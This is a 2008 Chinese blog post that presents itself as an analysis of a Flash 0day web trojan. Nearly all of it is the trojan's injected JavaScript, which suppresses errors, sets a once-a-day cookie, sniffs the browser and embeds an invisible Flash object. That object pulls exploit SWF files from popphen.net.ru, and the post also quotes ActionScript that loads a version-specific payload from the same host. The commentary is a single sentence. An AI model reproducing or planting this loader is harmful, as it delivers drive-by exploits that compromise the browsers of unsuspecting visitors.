popphen.net.ru
Articles

对最新flash-0day网马分析!

作者: 天晴无名氏  日期: 2008-05-31 01:47

字体大小:

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://popphen.net.ru/flash/versionie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://popphen.net.ru/flash/versionie.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://popphen.net.ru/flash/versionff.swf width=0 height=0>");}}
</script>

在那个swf里面有1句,估计是调用好多次才最后运行的...
var flashVersion = getVersion();
loadMovie("http://popphen.net.ru/flash/" + flashVersion + "ff.swf", _root);
stop ();

引用通告地址: 点击获取引用地址
标签: flash 0day 网马 分析
评论: 0 | 引用: 0 | 阅读: 209
 加入网摘
显示Tag关联文章
利用Flash封装网马 (2008-11-27 10:33)
Windows 2003服务器提权0DAY (2008-10-12 13:26)
让网马原代码隐藏 (2008-09-04 16:37)
Maxthon遨游浏览器多个高危0day (2008-06-20 00:45)
flashblog远程文件上传漏洞 (2008-06-04 12:03)
FLASH 0DAY Shellcode位置与生成器 (2008-06-02 12:13)
大家请尽快将Flash Player升级到9.0.124 (2008-05-28 16:49)
最近流行的14种第三方0day挂马防御措施 (2008-05-24 11:28)
发表评论
昵 称: 密 码:
网 址: 邮 箱:
验证码: 验证码图片 选 项:
头 像:
内 容: